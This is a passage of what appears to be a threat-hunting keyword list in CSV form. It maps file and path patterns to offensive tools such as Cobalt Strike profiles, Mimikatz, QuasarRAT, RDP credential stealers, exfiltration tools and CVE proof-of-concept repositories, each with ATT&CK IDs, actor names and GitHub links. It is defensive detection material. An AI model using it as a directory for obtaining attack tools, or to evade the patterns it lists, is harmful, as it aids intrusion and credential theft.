legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" +"*/qakbot.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/qconn-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/QHpix/CVE-2021-44521*","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tools","https://github.com/QHpix/CVE-2021-44521","1","1","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z" +"*/qscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/quake1-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/quake3-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/quake3-master-getservers.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/quantloader.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/Quasar.git*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar.v*.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/Quasar/releases*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*/quicserver.exe*","offensive_tool_keyword","ntlmquic","POC tools for exploring SMB over QUIC protocol","T1210.002 - T1210.003 - T1210.004","TA0001","N/A","N/A","Network Exploitation tools","https://github.com/xpn/ntlmquic","1","1","N/A","N/A","2","114","15","2022-04-06T11:22:11Z","2022-04-05T13:01:02Z" +"*/r00t-3xp10it*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/raceabrt.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/rahul1406/cve-2022-0847dirtypipe-exploit*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/rahul1406/cve-2022-0847dirtypipe-exploit","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/RAI.git*","offensive_tool_keyword","cobaltstrike","Rapid Attack Infrastructure (RAI)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/obscuritylabs/RAI","1","1","N/A","10","10","283","53","2021-10-06T17:44:19Z","2018-02-12T16:23:23Z" +"*/rakjong/mimikatz_bypassAV/*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*/ramnit.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/random-robbie/cve-2022-23131-exp*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0003 - TA0002","N/A","N/A","Exploitation tools","https://github.com/random-robbie/cve-2022-23131-exp/blob/main/zabbix.py","1","1","N/A","N/A","1","8","7","2022-02-23T16:37:13Z","2022-02-23T16:34:03Z" +"*/Ransomware.exe*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*/rarce.py*","offensive_tool_keyword","RaRCE","An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23","T1068 - T1203 - T1059.003","TA0001 - TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ignis-sec/CVE-2023-38831-RaRCE","1","1","N/A","9","2","108","18","2023-08-27T22:17:56Z","2023-08-27T21:49:37Z" +"*/rasman.exe*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*/RasmanPotato*","offensive_tool_keyword","RasmanPotato","using RasMan service for privilege escalation","T1548.002 - T1055.002 - T1055.001 ","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/crisprss/RasmanPotato","1","1","N/A","10","4","353","54","2023-02-06T10:27:41Z","2023-02-06T09:41:51Z" +"*/Rat_Generator*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/ratankba.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/ratchatpt.git*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/ratchatpt.git*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/ratchatPT.go*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/ratchatPT.syso*","offensive_tool_keyword","ratchatgpt","ratchatpt a tool using openai api as a C2","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","N/A","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/ratchatPT.syso*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z" +"*/RationalLove.c","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/raw/kali/main/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/raw/kali/master/*","offensive_tool_keyword","kali","Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering","T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation OS","https://www.kali.org/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/raw_shellcode_size.txt*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/rawrpc.py*","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/RC4BinaryEncryption.cs*","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","522","83","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" +"*/RC4Payload32.txt*","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" +"*/rcat-v*-win-x86_64.exe*","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","1","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"*/RCStep/CSSG/*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*/rdcman.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/RDE1.git*","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","1","N/A","10","10","31","3","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" +"*/rdll_template*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/rdp.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/RDPassSpray.git*","offensive_tool_keyword","RDPassSpray","Python3 tool to perform password spraying using RDP","T1110.003 - T1059.006 - T1076.001","TA0001 - TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/xFreed0m/RDPassSpray","1","1","N/A","10","6","588","376","2023-08-17T15:09:50Z","2019-06-05T17:10:42Z" +"*/RDPCredentialStealer.git*","offensive_tool_keyword","RDPCredentialStealer","RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++","T1555.001 - T1059.002 - T1552.002","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/S12cybersecurity/RDPCredentialStealer","1","1","N/A","10","2","196","34","2023-06-14T10:25:33Z","2023-06-13T01:30:26Z" +"*/rdp-enum-encryption.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rdp-ntlm-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/rdp-vuln-ms12-020.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/readfile_bof.*","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - 